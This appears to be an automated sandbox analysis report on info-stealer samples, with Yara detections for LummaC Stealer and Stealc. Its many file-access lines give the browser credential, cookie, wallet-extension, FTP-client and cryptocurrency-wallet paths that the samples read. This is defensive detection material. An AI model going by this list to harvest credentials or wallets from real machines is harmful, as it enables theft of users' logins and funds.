Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: number of queries: 1413
Yara detected Credential Stealer
Source: Yara match File source: 0000000D.00000003.2629694606.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2672725289.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2585953036.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2585858854.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2658132730.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2628157062.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1729402235.00000000011BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2604592172.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2628798588.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 6292, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000C.00000003.2607023655.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 275df0ca27.exe PID: 2312, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 6292, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 28.2.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2529289944.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
